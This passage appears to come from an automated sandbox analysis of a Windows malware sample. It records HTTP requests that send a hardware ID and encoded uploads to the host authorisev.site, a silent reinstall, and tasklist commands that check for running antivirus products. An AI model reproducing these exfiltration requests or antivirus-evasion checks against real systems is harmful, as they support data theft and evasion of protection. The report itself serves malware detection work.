                                                                                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"CCECC4CF99B7F41760B13C460777D8F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"MkfS5f----b
                                                                                                                                                  2024-11-01 09:51:03 UTC15331OUTData Raw: 2a 5e 2d 4f 11 53 f2 55 fe 38 36 a4 04 ac a5 ea 4a c6 09 94 e5 a9 96 1c 8e 11 fd 0c 0e dc 21 b2 1c f7 4e dc 49 b6 c6 8b 5d 71 34 64 b5 c6 03 16 6e 4f b4 fc 61 de ef 17 f9 71 6e fd ea 56 2d 6b 52 11 a4 31 b0 b4 d7 cd 81 0b ea 77 bf f5 7e 2e 75 cd e3 ca af 39 5f 87 8b 1f 1f cf 31 96 12 3f 5e 29 b0 1d be 5c a2 a8 53 30 27 ea 26 d9 f3 02 14 de 1b 7c 9f 2e 06 d6 3f eb 46 ad 20 b6 bf c2 ac 91 9b da 55 65 4a aa 54 39 25 f3 1e 14 18 b8 a8 44 74 6a d1 32 3b fb a7 04 0a a3 b3 3c 60 07 7e 46 8a ec 0c 4a 90 62 4e 93 d1 67 15 54 ea e5 26 9c 52 f9 0f 09 e8 55 ae cf cc b9 ec 1b 30 8e f4 cd 70 6a 5b 73 15 f5 e6 17 02 ef 01 cc eb 3a 5f c0 cc ac 72 b4 cb af f2 67 83 b6 50 e4 a3 19 92 39 d7 cf 2f 92 c1 a2 8c d9 1d fd 9a ab e8 ac 76 11 a4 ae 74 d0 ef 1d ae 43 b9 5e d4 a3 e6
                                                                                                                                                  Data Ascii: *^-OSU86J!NI]q4dnOaqnV-kR1w~.u9_1?^)\S0'&|.?F UeJT9%Dtj2;<`~FJbNgT&RU0pj[s:_rgP9/vtC^
                                                                                                                                                  2024-11-01 09:51:03 UTC15331OUTData Raw: fa 20 ed c0 75 15 4b 18 b5 06 cb ee 19 f5 6b 71 a0 3f 9f cf f7 17 77 0a 29 aa 9a 79 15 37 62 93 e2 48 5b af a2 ff c5 cc a4 5b 4f 68 d3 d9 1e b7 64 ef 4b da 3f 38 43 2d e0 60 43 dc c0 8f fa fe 03 00 c3 5f e5 92 5d e5 3d 77 ea f0 4e d5 48 c5 fe 94 ca b2 30 df ec ed 4c 03 1b da b1 8c 9a fa 9a da 3b 97 b8 18 63 a3 3c 12 e5 7d e7 1d 3e f7 d5 d4 5e ab 79 51 b9 b0 2b 4d 0d be fe 15 5e 46 4d 28 1b dd 5a db bc 45 e2 02 e4 5f 6c 78 c0 ee 71 ac ea 8e d3 6b cf 75 f2 05 e9 b2 22 36 82 e2 b6 85 06 97 9f 70 74 21 a0 26 82 3f 87 31 71 50 96 a8 34 27 91 0b 60 41 d5 a5 9d 0b ff 49 87 23 bd f9 18 15 8e 46 01 c9 67 f0 1c b9 77 88 73 e3 b0 f8 55 e8 1c cb 41 4a 38 51 9d 23 3e 35 dc 78 b9 90 97 67 fa 61 04 b4 e5 c1 ef 14 1e d0 2b 33 e0 3e 7a 36 ee f4 51 e4 e5 01 74 96 49 67 ce
                                                                                                                                                  Data Ascii: uKkq?w)y7bH[[OhdK?8C-`C_]=wNH0L;c<}>^yQ+M^FM(ZE_lxqku"6pt!&?1qP4'`AI#FgwsUAJ8Q#>5xga+3>z6QtIg
                                                                                                                                                  2024-11-01 09:51:03 UTC15331OUTData Raw: 3d 56 dd 93 1a 3b bc c4 ef 7f bd 8e 5a 78 ae 1e 17 43 6c 00 db 51 f5 3f 48 4a 1e cc 83 13 2e 0e 0a 8a 0a 8e 15 de b7 cb e4 7c 2f 1f c6 c4 9d a6 a3 82 1c 0e a7 ee 59 35 d7 b2 cf fa 4c 9b 90 6d f1 a5 94 41 be 97 bd e5 c2 43 be b3 81 88 46 fc 5c ea 77 a3 10 c1 67 d2 2d 1a 57 ce 09 f6 40 b8 2a 29 53 4c 0a 17 38 7a a0 78 37 8a db 1b 50 a8 0b 2d 63 b7 ea d1 75 75 b9 08 3a 2e 35 de 7e b4 10 ed f5 7e 64 63 dc d0 5a fd 8a 35 6d b9 77 42 bd de 50 19 7d d7 73 73 e0 39 49 2d c8 17 f8 37 62 04 74 29 e7 f0 6d a9 95 ca 78 e8 5e c8 6d 63 6f 83 e1 d4 3d 03 11 93 57 cb dc 1b ec cf 6a 44 5c 04 c1 08 26 8f 82 fa 0e 53 88 2c cc cc 6a 04 89 ff fe e2 cb d6 42 9a fd 10 7b 80 df de b6 72 e6 84 09 25 7b 66 d9 46 f0 c0 95 d3 0e 8e 2b ec 40 56 72 20 73 74 96 15 d0 04 97 ed 44 0d 04
                                                                                                                                                  Data Ascii: =V;ZxClQ?HJ.|/Y5LmACF\wg-W@*)SL8zx7P-cuu:.5~~dcZ5mwBP}ss9I-7bt)mx^mco=WjD\&S,jB{r%{fF+@Vr stD
                                                                                                                                                  2024-11-01 09:51:03 UTC15331OUTData Raw: ba 32 34 2c 51 a1 ce 23 5f 27 24 ed d4 57 88 5b d6 e2 9a b8 1a 19 28 30 52 8c 0d f5 b7 b1 df 6e c6 9e a9 f4 24 da 4f 18 99 70 df ac ab f0 88 ce 4c 81 f6 d7 60 62 98 7f d3 70 73 bb 6f be 9c 25 5a 8b bc 6f 6d b4 e2 d9 e7 0d d1 b6 f1 00 a2 b1 41 c3 52 41 43 b9 7a 7a d3 e3 a0 31 7f 2e 00 1a e4 27 85 f9 47 e1 86 92 f3 6d 82 f5 12 9f dd fd 31 d1 04 b2 1b 8c 8d 2b 5e 9e c3 6f 9e 02 a6 be 16 c3 83 e9 43 66 72 70 e8 5d 1b c7 8f 12 83 52 d1 02 b5 e5 d3 46 0e af 9e 69 5d 5a 73 b0 0d b6 7c 71 67 70 e8 fb 96 cb db a0 5f 9e a1 e1 10 ac 5b bc c2 15 19 07 87 f5 34 40 e6 5c 9c 93 e4 b6 4b ab e4 53 6c 9f b8 ba 1c 63 12 da af 0b f0 af d5 2e aa 70 18 5a 53 9f 52 f3 b5 90 79 61 48 ca 4b 24 bd a7 a7 4c 9c 4c d9 0d 91 1b 55 e9 91 2b 1f 5b 28 50 31 b7 66 54 dc d9 c3 03 6a 70 c7
                                                                                                                                                  Data Ascii: 24,Q#_'$W[(0Rn$OpL`bpso%ZomARACzz1.'Gm1+^oCfrp]RFi]Zs|qgp_[4@\KSlc.pZSRyaHK$LLU+[(P1fTjp
                                                                                                                                                  2024-11-01 09:51:03 UTC15331OUTData Raw: 9d 35 af ab f1 99 b2 cb 2e 6c cf e9 14 27 6f ba 85 3d 7c af 44 d7 97 50 dd ff 3d 55 c1 88 a0 5c 19 85 36 0b 92 c9 6b 16 89 7b 08 60 bd 4f ae 0d 10 e9 20 52 c1 1f 98 73 17 5a a3 cf d6 42 b3 e7 6a 87 1b 1f 1c 91 80 f1 f7 86 8c 3a 48 fd 08 29 f8 ae 34 6e 1d 84 c1 01 5a 02 44 97 28 57 1f 00 0c 7d 40 af e3 a7 eb af 9d b4 a5 75 7b 4f 99 51 17 7f 36 ee e2 30 ef 29 ec b0 ee 0d f4 5f f3 51 3f c8 39 ce 65 a9 db 64 41 39 f3 dc 6e a0 43 69 1d 3d a7 95 ea cf 83 3d aa a7 de 96 c9 e2 bb be b9 58 8d 06 03 2d 8b b7 ca 94 9c 08 10 e3 65 60 65 ab 04 c3 81 22 f4 66 53 51 24 51 07 f9 c2 ab 65 5a 8e d7 3c 6f 40 10 b5 d4 3d 60 0b f7 f1 3a 03 f2 b5 99 49 bb 1d c0 55 08 b2 ce 42 c1 b5 07 80 ec 7d ac 7a 68 4d ff 7f 77 33 5d 7a a9 9b d3 af 4f 44 ef 13 d8 89 e0 fa 1c dd c7 e0 52 34
                                                                                                                                                  Data Ascii: 5.l'o=|DP=U\6k{`O RsZBj:H)4nZD(W}@u{OQ60)_Q?9edA9nCi==X-e`e"fSQ$QeZ<o@=`:IUB}zhMw3]zODR4
                                                                                                                                                  2024-11-01 09:51:03 UTC15331OUTData Raw: aa 93 19 05 97 57 a5 40 52 11 77 1a c6 bc cb 11 b2 87 88 ab 69 a5 2c c0 b4 5f 75 1d ad e2 87 44 59 47 0d a5 ed 00 61 06 71 b6 47 0f f6 47 8f 28 5a 11 04 58 97 4e 3b 87 75 36 16 44 47 4b 4a 7f 54 2e 95 00 97 1f c4 68 83 19 43 aa fd 52 cc 0f 6d 74 cc 04 76 c8 a9 5d 9c f5 4b 2a f2 10 50 92 8b f4 fe 1d 13 1d b9 d9 b8 f8 8c 76 10 25 88 3a 9b 16 5a c2 60 f8 d5 df c6 23 93 1e b8 9c 1b 68 5a b6 c5 7a 44 0c c2 11 d1 92 b2 d7 0e 75 53 8e e8 b3 26 a5 3f 09 9b 2e 08 1f 02 49 58 6e c2 1e 8f 9a 98 40 1a 0f a2 40 8f a5 97 0a 95 8b b9 14 c8 47 0b 6c 5a 44 31 23 ce 2f ab f9 b7 2e 69 12 bd 95 84 93 34 fc 58 57 1f d9 3d 77 c9 05 5f 25 a3 ba 83 0e 99 0a 66 2b 65 fa b6 90 4c cd e2 17 f7 8d bd fc 24 fe 55 32 fa 6b 7f e4 f4 ba db 11 fb 8b b1 0e c0 d4 be 11 53 10 bf f5 91 27 e5
                                                                                                                                                  Data Ascii: W@Rwi,_uDYGaqGG(ZXN;u6DGKJT.hCRmtv]K*Pv%:Z`#hZzDuS&?.IXn@@GlZD1#/.i4XW=w_%f+eL$U2kS'
                                                                                                                                                  2024-11-01 09:51:03 UTC15331OUTData Raw: 25 f2 62 46 64 a2 3d 79 d7 48 39 a5 f6 a7 9c 21 29 3a a8 ff 63 21 ef 28 a6 fa 0c 7c 67 e2 e0 1e 5e 57 eb 77 3e 89 21 e7 dc 5d e6 1d 42 13 78 60 e6 49 96 fc 8a d1 8b 19 a3 8d 5c 30 07 16 0c 4b 05 6a f5 a2 3d a9 95 1d 03 c9 26 55 dd 5a f6 15 c1 66 6c c5 cc 3f cb c2 fc 5d 25 dd 2a 81 f9 d9 3b 71 fc d0 a6 30 c1 98 ec bc bb 7a 37 66 22 d9 e8 59 19 8b e2 23 b4 a8 13 7c 75 7b da cf 0c 30 51 c5 b0 dc a5 bb 78 d0 63 22 bf b0 da 70 f3 d7 91 3d f3 54 e3 c1 1b 3b 66 eb d8 8a c6 a9 7a 9c eb b7 54 44 4d b2 1c f6 db 46 9e 43 7c 8c 84 88 37 4e e0 79 ab 76 bc d2 04 67 a9 5d 27 c3 90 70 fc b9 67 e5 79 cf 79 c5 c0 85 6f 30 31 dd d6 e7 59 23 77 58 9d d4 6d 12 16 0f c2 29 50 3c 24 c6 99 54 51 1f 89 ed 62 73 d5 0f 9b 85 05 fd 90 7a 5a 3e 23 bd cf 7c c2 06 a6 6f e3 74 86 3f e4
                                                                                                                                                  Data Ascii: %bFd=yH9!):c!(|g^Ww>!]Bx`I\0Kj=&UZfl?]%*;q0z7f"Y#|u{0Qxc"p=T;fzTDMFC|7Nyvg]'pgyyo01Y#wXm)P<$TQbszZ>#|ot?
                                                                                                                                                  2024-11-01 09:51:03 UTC15331OUTData Raw: 49 1a 09 eb 88 81 ab fd f9 a6 46 69 6c 0e 1f f0 0a 16 b4 a6 5a 1f 79 2d 2c 6b 3c 99 f8 7b 9b fa 93 2c b4 c7 bb 16 8e fc a0 da 35 5a 8a 20 0c bd e9 4c 14 34 2d c3 44 6d b5 0f 7b 9e ed 6d e3 7d db 6f d3 6c 16 50 44 54 02 16 3f 84 9b 7e 47 de 97 ec 64 4a bc 3a 9e 29 07 e1 d2 c2 af b3 77 63 ce f6 a4 0f c9 df 0d 2e 38 72 e7 82 4c ed 4e b2 af e0 1d 7f bf d9 1a 2e 0c c6 c2 be c7 2a 9a 94 ba f7 ca 04 5f 03 41 51 e1 22 ff a4 89 53 56 9d 8d 33 dc bd 2f 9b 8a 35 1f 50 99 df d8 ca 48 93 06 d3 5b 1c 91 7b a5 6d d7 ac 67 7d 10 45 06 4e 90 89 f8 ff 1b 2a 33 08 1c ee f4 45 c2 cf 69 7f ca 59 73 34 44 4b a1 40 a3 d4 1d 23 d1 23 32 c1 f5 2b de 10 10 e1 ae dd d9 ab 67 c4 15 29 c7 ed d1 46 cd b5 b8 74 b2 ea dc fa 8b 73 da ce 69 32 53 7d 05 0b ea bf ab 15 d3 76 94 2c 23 a8 83
                                                                                                                                                  Data Ascii: IFilZy-,k<{,5Z L4-Dm{m}olPDT?~GdJ:)wc.8rLN.*_AQ"SV3/5PH[{mg}EN*3EiYs4DK@##2+g)Ftsi2S}v,#
                                                                                                                                                  2024-11-01 09:51:03 UTC15331OUTData Raw: 1e 50 d6 ca a7 a7 e6 df 16 df 63 e6 39 fc bf 0e 84 80 30 43 3b 03 ae 28 d0 da 50 60 eb 2f 76 a0 06 24 d1 12 17 da f7 eb 9b 27 01 8d ec 58 b5 fa 29 6d a2 7b 7f b4 9a c9 5c 4f e8 82 ce ee e7 3b 31 9e b8 13 47 22 0d 7c bf 8b eb 5c 7c 54 8d d7 4c e0 75 2d 6f a8 a3 6a ef c3 bc b5 f4 0d 14 91 66 b1 be 38 5c 68 7a 7a 50 62 61 0b b8 35 4f 03 a2 8d e5 91 3b bc 60 36 67 13 01 fc 1f 54 72 0c ed 75 87 a5 1f 97 12 b9 48 dd 3c bd 12 e0 0a e4 6a 43 4e 4f d3 b2 3f b4 c3 d6 cd 55 0b 27 e9 25 44 e7 01 bb 50 aa f7 40 a3 62 fd e5 e7 ab e6 3d e9 87 41 6c 20 12 fc 92 b5 47 f1 8b 81 d3 63 5a db f8 37 4a 55 2f cb d8 38 2a 47 81 8d 6c 16 60 6d 1d a3 c4 16 34 a7 73 a8 36 4a d4 cf d9 ea 26 38 7a 9d 2c 26 c6 fe 73 ac ff ee 43 6b 17 6f a5 c7 de 16 07 22 2b c2 7f 85 59 a7 2a b2 66 50
                                                                                                                                                  Data Ascii: Pc90C;(P`/v$'X)m{\O;1G"|\|TLu-ojf8\hzzPba5O;`6gTruH<jCNO?U'%DP@b=Al GcZ7JU/8*Gl`m4s6J&8z,&sCko"+Y*fP
                                                                                                                                                  2024-11-01 09:51:06 UTC1021INHTTP/1.1 200 OK
                                                                                                                                                  Date: Fri, 01 Nov 2024 09:51:06 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=nv3bcaqcnesufel2bp37ejr1k0; expires=Tue, 25-Feb-2025 03:37:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pkbYBszeTVv7TOh8bPK12Y83kgfc%2FaE74Umpod6Z2UOpZHfwcq87maPGC%2FvaV%2FooyILdn%2ByEpMYkJ4CMVXU4V14RNEh1bOct%2FTjNKvXNfV1IAV9vrvclgpUwFekmUYYbFDw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8dbafbf23b396c38-DFW
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1317&sent=192&recv=553&lost=0&retrans=0&sent_bytes=2836&recv_bytes=566183&delivery_rate=2659320&cwnd=252&unsent_bytes=0&cid=5f9c2ef17e700d38&ts=2475&x=0"


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  7192.168.2.449793104.21.85.1944437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-01 09:51:07 UTC352OUTPOST /api HTTP/1.1
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                  Content-Length: 77
                                                                                                                                                  Host: authorisev.site
                                                                                                                                                  2024-11-01 09:51:07 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 6b 66 53 35 66 2d 2d 26 6a 3d 26 68 77 69 64 3d 43 43 45 43 43 34 43 46 39 39 42 37 46 34 31 37 36 30 42 31 33 43 34 36 30 37 37 37 44 38 46 31
                                                                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=MkfS5f--&j=&hwid=CCECC4CF99B7F41760B13C460777D8F1
                                                                                                                                                  2024-11-01 09:51:07 UTC1012INHTTP/1.1 200 OK
                                                                                                                                                  Date: Fri, 01 Nov 2024 09:51:07 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: close
                                                                                                                                                  Set-Cookie: PHPSESSID=gaseco4unaqjpbnbaf2q7jif8p; expires=Tue, 25-Feb-2025 03:37:46 GMT; Max-Age=9999999; path=/
                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                  vary: accept-encoding
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h6DXZgCk4v6ddu%2BvRisk5I9YkeOQnCFwsve2psncwq0ZrZSF4zFneT49DZBKir0UzSdOsE2eQHBg%2FRCA7JbMJk0fSDpfWPsHVYgvwZFNNX%2BBFH7QkoVGpI3c0%2BLYVEFG3yI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8dbafc059e81e722-DFW
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1065&delivery_rate=1815673&cwnd=249&unsent_bytes=0&cid=5aaeaebd0db0cd98&ts=479&x=0"
                                                                                                                                                  2024-11-01 09:51:07 UTC54INData Raw: 33 30 0d 0a 76 67 73 75 4b 71 7a 4a 4a 6d 51 68 31 41 33 36 38 75 6e 4a 6b 64 6f 37 50 34 4c 6e 31 47 39 42 75 35 31 48 6b 30 41 6e 2f 2f 72 6c 56 67 3d 3d 0d 0a
                                                                                                                                                  Data Ascii: 30vgsuKqzJJmQh1A368unJkdo7P4Ln1G9Bu51Hk0An//rlVg==
                                                                                                                                                  2024-11-01 09:51:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:05:49:59
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                  Imagebase:0xfa0000
                                                                                                                                                  File size:6'172'760 bytes
                                                                                                                                                  MD5 hash:6FDF2CDF68AB1880AA76E7938E241FA3
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:1
                                                                                                                                                  Start time:05:49:59
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp" /SL5="$40476,2820349,845824,C:\Users\user\Desktop\file.exe"
                                                                                                                                                  Imagebase:0xe90000
                                                                                                                                                  File size:3'366'912 bytes
                                                                                                                                                  MD5 hash:945EC37B9971C5E9F26FAFAD6EDFD46E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:2
                                                                                                                                                  Start time:05:49:59
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe" /VERYSILENT
                                                                                                                                                  Imagebase:0xfa0000
                                                                                                                                                  File size:6'172'760 bytes
                                                                                                                                                  MD5 hash:6FDF2CDF68AB1880AA76E7938E241FA3
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:3
                                                                                                                                                  Start time:05:50:00
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp" /SL5="$2047E,2820349,845824,C:\Users\user\Desktop\file.exe" /VERYSILENT
                                                                                                                                                  Imagebase:0x20000
                                                                                                                                                  File size:3'366'912 bytes
                                                                                                                                                  MD5 hash:945EC37B9971C5E9F26FAFAD6EDFD46E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:05:50:01
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                                  Imagebase:0x7ff6cb810000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:5
                                                                                                                                                  Start time:05:50:01
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:6
                                                                                                                                                  Start time:05:50:01
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff704e00000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:7
                                                                                                                                                  Start time:05:50:01
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "wrsa.exe"
                                                                                                                                                  Imagebase:0x7ff613bc0000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:8
                                                                                                                                                  Start time:05:50:01
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                                  Imagebase:0xaa0000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:9
                                                                                                                                                  Start time:05:50:01
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:10
                                                                                                                                                  Start time:05:50:01
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                                  Imagebase:0x7ff704e00000
                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:11
                                                                                                                                                  Start time:05:50:01
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\find.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:find /I "opssvc.exe"
                                                                                                                                                  Imagebase:0x7ff613bc0000
                                                                                                                                                  File size:17'920 bytes
                                                                                                                                                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:12
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                                  Imagebase:0x7ff6cb810000
                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:13
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:14
                                                                                                                                                  Start time:05:50:02
                                                                                                                                                  Start date:01/11/2024
                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                  Wow64 process (32bit):false
